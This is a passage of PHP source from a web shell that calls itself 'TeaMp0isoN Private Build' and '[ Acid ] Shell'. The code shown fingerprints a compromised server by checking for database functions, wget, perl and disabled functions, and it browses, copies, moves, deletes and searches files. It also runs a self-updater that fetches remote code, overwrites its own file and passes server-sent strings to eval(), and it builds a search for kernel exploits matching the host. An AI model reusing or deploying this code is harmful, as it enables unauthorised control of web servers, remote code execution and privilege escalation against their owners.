2861else { return "$sup: <font color=orange><b>OFF</b></font>"; }
2862}
2863$arrfunc = array(
2864array("MySQL","mysql_connect"),
2865array("MSSQL","mssql_connect"),
2866array("Oracle","ocilogon"),
2867array("PostgreSQL","pg_connect"),
2868array("Curl","curl_version"),
2869);
2870$arrcmd = array(
2871array("Fetch","fetch --help"),
2872array("Wget","wget --help"),
2873array("Perl","perl -v"),
2874);
2875
2876$statinfo = array();
2877foreach ($arrfunc as $func) {
2878if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
2879else { $statinfo[] = showstat($func[0],"off"); }
2880}
2881$statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off");
2882foreach ($arrcmd as $cmd) {
2883if (tpexec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
2884else { $statinfo[] = showstat($cmd[0],"off"); }
2885}
2886return implode(" ",$statinfo);
2887}
2888function showdisfunc() {
2889if ($disablefunc = @ini_get("disable_functions")) {
2890return "<font color=orange><b>".$disablefunc."</b></font>";
2891}
2892else { return "<font color=orange><b>NONE</b></b></font>"; }
2893}
2894function disp_drives($curdir,$surl) {
2895$letters = "";
2896$v = explode("\\",$curdir);
2897$v = $v[0];
2898foreach (range("A","Z") as $letter) {
2899$bool = $isdiskette = $letter == "A";
2900if (!$bool) { $bool = is_dir($letter.":\\"); }
2901if ($bool) {
2902$letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
2903($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
2904if ($letter.":" != $v) { $letters .= $letter; }
2905else { $letters .= "<font color=orange>".$letter."</font>"; }
2906$letters .= "</a> ";
2907}
2908}
2909if (!empty($letters)) { Return $letters; }
2910else {Return "None"; }
2911}
2912function disp_freespace($curdrv) {
2913$free = @disk_free_space($curdrv);
2914$total = @disk_total_space($curdrv);
2915if ($free === FALSE) { $free = 0; }
2916if ($total === FALSE) { $total = 0; }
2917if ($free < 0) { $free = 0; }
2918if ($total < 0) { $total = 0; }
2919$used = $total-$free;
2920$free_percent = round(100/($total/$free),2)."%";
2921$free = view_size($free);
2922$total = view_size($total);
2923return "$free of $total ($free_percent)";
2924}
2925
2926function tpgetsource($fn) {
2927global $tpsh_sourcesurl;
2928$array = array(
2929"tpsh.php" => "tpsh.txt",
2930);
2931$name = $array[$fn];
2932if ($name) {return file_get_contents($tpsh_sourcesurl.$name);}
2933else {return FALSE;}
2934}
2935function tpsh_getupdate($update = TRUE) {
2936$url = $GLOBALS["tpsh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
2937$data = @file_get_contents($url);
2938if (!$data) { return "Can't connect to update-server!"; }
2939else {
2940$data = ltrim($data);
2941$string = substr($data,3,ord($data{2}));
2942if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
2943if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
2944if ($data{0} == "\x99" and $data{1} == "\x03") {
2945$string = explode("|",$string);
2946if ($update) {
2947$confvars = array();
2948$sourceurl = $string[0];
2949$source = file_get_contents($sourceurl);
2950if (!$source) {return "Can't fetch update!";}
2951else {
2952$fp = fopen(__FILE__,"w");
2953if (!$fp) {return "Local error: can't write update to ".__FILE__." You may download tpshell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
2954else {
2955fwrite($fp,$source);
2956fclose($fp);
2957return "Update completed!";
2958}
2959}
2960}
2961else {return "New version are available: ".$string[1];}
2962}
2963elseif ($data{0} == "\x99" and $data{1} == "\x04") {
2964eval($string);
2965return 1;
2966}
2967else {return "Error in protocol: segmentation failed! (".$data.") ";}
2968}
2969}
2970function tp_buff_prepare() {
2971global $sess_data;
2972global $act;
2973foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
2974foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
2975$sess_data["copy"] = array_unique($sess_data["copy"]);
2976$sess_data["cut"] = array_unique($sess_data["cut"]);
2977sort($sess_data["copy"]);
2978sort($sess_data["cut"]);
2979if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
2980else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
2981}
2982function tp_sess_put($data) {
2983global $sess_cookie;
2984global $sess_data;
2985tp_buff_prepare();
2986$sess_data = $data;
2987$data = serialize($data);
2988setcookie($sess_cookie,$data);
2989}
2990
2991
2992function fs_copy_dir($d,$t) {
2993$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2994if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2995$h = opendir($d);
2996while (($o = readdir($h)) !== FALSE) {
2997if (($o != ".") and ($o != "..")) {
2998if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2999else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
3000if (!$ret) {return $ret;}
3001}
3002}
3003closedir($h);
3004return TRUE;
3005}
3006function fs_copy_obj($d,$t) {
3007$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
3008$t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
3009if (!is_dir(dirname($t))) {mkdir(dirname($t));}
3010if (is_dir($d)) {
3011if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3012if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
3013return fs_copy_dir($d,$t);
3014}
3015elseif (is_file($d)) { return copy($d,$t); }
3016else { return FALSE; }
3017}
3018function fs_move_dir($d,$t) {
3019$h = opendir($d);
3020if (!is_dir($t)) {mkdir($t);}
3021while (($o = readdir($h)) !== FALSE) {
3022if (($o != ".") and ($o != "..")) {
3023$ret = TRUE;
3024if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
3025else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
3026if (!$ret) {return $ret;}
3027}
3028}
3029closedir($h);
3030return TRUE;
3031}
3032function fs_move_obj($d,$t) {
3033$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
3034$t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
3035if (is_dir($d)) {
3036if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3037if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
3038return fs_move_dir($d,$t);
3039}
3040elseif (is_file($d)) {
3041if(copy($d,$t)) {return unlink($d);}
3042else {unlink($t); return FALSE;}
3043}
3044else {return FALSE;}
3045}
3046function fs_rmdir($d) {
3047$h = opendir($d);
3048while (($o = readdir($h)) !== FALSE) {
3049if (($o != ".") and ($o != "..")) {
3050if (!is_dir($d.$o)) {unlink($d.$o);}
3051else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
3052}
3053}
3054closedir($h);
3055rmdir($d);
3056return !is_dir($d);
3057}
3058function fs_rmobj($o) {
3059$o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
3060if (is_dir($o)) {
3061if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
3062return fs_rmdir($o);
3063}
3064elseif (is_file($o)) {return unlink($o);}
3065else {return FALSE;}
3066}
3067
3068function onphpshutdown() {
3069global $gzipencode,$ft;
3070if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
3071$v = @ob_get_contents();
3072@ob_end_clean();
3073@ob_start("ob_gzHandler");
3074echo $v;
3075@ob_end_flush();
3076}
3077}
3078function tpshexit() { onphpshutdown(); exit; }
3079
3080function tpfsearch($d) {
3081global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
3082if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3083$h = opendir($d);
3084while (($f = readdir($h)) !== FALSE) {
3085if($f != "." && $f != "..") {
3086$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
3087if (is_dir($d.$f)) {
3088$search_i_d++;
3089if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
3090if (!is_link($d.$f)) {tpfsearch($d.$f);}
3091}
3092else {
3093$search_i_f++;
3094if ($bool) {
3095if (!empty($a["text"])) {
3096$r = @file_get_contents($d.$f);
3097if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
3098if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
3099if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
3100else {$bool = strpos(" ".$r,$a["text"],1);}
3101if ($a["text_not"]) {$bool = !$bool;}
3102if ($bool) {$found[] = $d.$f; $found_f++;}
3103}
3104else {$found[] = $d.$f; $found_f++;}
3105}
3106}
3107}
3108}
3109closedir($h);
3110}
3111function view_size($size) {
3112if (!is_numeric($size)) { return FALSE; }
3113else {
3114if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
3115elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
3116elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
3117else {$size = $size . " B";}
3118return $size;
3119}
3120}
3121function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
3122function view_perms($mode) {
3123if (($mode & 0xC000) === 0xC000) {$type = "s";}
3124elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
3125elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
3126elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
3127elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
3128elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
3129elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
3130else {$type = "?";}
3131$owner["read"] = ($mode & 00400)?"r":"-";
3132$owner["write"] = ($mode & 00200)?"w":"-";
3133$owner["execute"] = ($mode & 00100)?"x":"-";
3134$group["read"] = ($mode & 00040)?"r":"-";
3135$group["write"] = ($mode & 00020)?"w":"-";
3136$group["execute"] = ($mode & 00010)?"x":"-";
3137$world["read"] = ($mode & 00004)?"r":"-";
3138$world["write"] = ($mode & 00002)? "w":"-";
3139$world["execute"] = ($mode & 00001)?"x":"-";
3140if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
3141if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
3142if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
3143return $type.join("",$owner).join("",$group).join("",$world);
3144}
3145function parse_perms($mode) {
3146if (($mode & 0xC000) === 0xC000) {$t = "s";}
3147elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
3148elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
3149elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
3150elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
3151elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
3152elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
3153else {$t = "?";}
3154$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
3155$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
3156$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
3157return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
3158}
3159function parsesort($sort) {
3160$one = intval($sort);
3161$second = substr($sort,-1);
3162if ($second != "d") {$second = "a";}
3163return array($one,$second);
3164}
3165function view_perms_color($o) {
3166if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
3167elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
3168else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
3169}
3170function str2mini($content,$len) {
3171if (strlen($content) > $len) {
3172$len = ceil($len/2) - 2;
3173return substr($content, 0,$len)."...".substr($content,-$len);
3174} else {return $content;}
3175}
3176function strips(&$arr,$k="") {
3177if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
3178else { $arr = stripslashes($arr); }
3179}
3180
3181function getmicrotime() {
3182list($usec, $sec) = explode(" ", microtime());
3183return ((float)$usec + (float)$sec);
3184}
3185
3186function milw0rm() {
3187$Lversion = php_uname(r);
3188$OSV = php_uname(s);
3189if(eregi("Linux",$OSV)) {
3190$Lversion = substr($Lversion,0,6);
3191return "http://packetstormsecurity.org/search/?q=Linux Kernel ".$Lversion;
3192} else {
3193$Lversion = substr($Lversion,0,3);
3194return "http://packetstormsecurity.org/search/?q=".$OSV." ".$Lversion;
3195}
3196}
3197
3198
3199function sh_name() { return base64_decode("VGVhTXAwaXNvTiBQcml2YXRlIEJ1aWxkIFsgQkVUQSBd"); }
3200function htmlhead($safemode) {
3201$style = '
3202<style type="text/css">
3203body,table {font:8pt verdana;background-color:black;}
3204table {width:100%;}
3205table,td,#maininfo td {padding:3px;}
3206table,td,input,select,option {border:1px solid #808080;}
3207body,table,input,select,option {color:#FFFFFF;}
3208a {color:lightblue;text-decoration:none; } a:link {color:#5B5BFF;} a:hover {text-decoration:underline;} a:visited {color:#99CCFF;}
3209textarea {color:#dedbde;font:8pt Courier New;border:1px solid #666666;2;}
3210#pagebar {padding:5px;border:3px solid #1E1E1E;border-collapse:collapse;}
3211#pagebar td {vertical-align:top;}
3212#pagebar,#pagebar p,.info,input,select,option {font:8pt tahoma;}
3213#pagebar a {font-weight:bold;color:orange;}
3214#pagebar a:visited {color:#000000;}
3215#mainmenu {text-align:center;}
3216#mainmenu a {text-align: center;padding: 0px 5px 0px 5px;}
3217#maininfo,.barheader,.bartitle {text-align:center;}
3218.fleft {float:left;text-align:left;}
3219.fright {float:right;text-align:right;}
3220.bartitle {padding:5px;border:2px solid #000000;}
3221.barheader {font-weight:bold;padding:5px;}
3222.info,.info td,.info th {0;padding:0;border-collapse:collapse;}
3223.info th {color:orange;text-align:left;width:13%;}
3224.contents,.explorer {border-collapse:collapse;}
3225.contents,.explorer td,th {vertical-align:top;}
3226.mainpanel {border-collapse:collapse;padding:5px;}
3227.barheader,.mainpanel table,td {border:1px solid #333333;}
3228input[type="submit"],input[type="button"] {border:1px solid #000000;}
3229input[type="text"] {padding:3px;}
3230.shell {background-color:#000000;color:orange;padding:5px;12;}
3231.fxerrmsg {color:red; font-weight:bold;}
3232#pagebar,#pagebar p,h1,h2,h3,h4,form {0;}
3233#pagebar,.mainpanel,input[type="submit"],input[type="button"] {background-color:#000000;}
3234.bartitle,input,select,option,input[type="submit"]:hover,input[type="button"]:hover {background-color:#333333;}
3235textarea,#pagebar input[type="text"],.mainpanel input[type="text"],input[type="file"],select,option {background-color:#000000;}
3236input[type="label"] { text-align:right;}
3237.info,.info td,input[type="label"] {border:0;background:none;}
3238</style>
3239';
3240$html_start = '
3241<html><head>
3242<title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
3243'.$style.'
3244</head>
3245<body>
3246<center><img src="http://s019.radikal.ru/i642/1301/8b/4b8d2f31486f.png" alt="ShellBanner"></center>
3247';
3248return $html_start;
3249};
3250function footer() {
3251echo "<div class=bartitle colspan=2><font size=2 color=#00FF00><b> [ Acid ] Shell - #Version 1! [PRIV4TE] -; Generated: ".round(getmicrotime()-starttime,4)." seconds</b></font></div>";
3252}
3253chdir($lastdir); tpshexit();
3254?>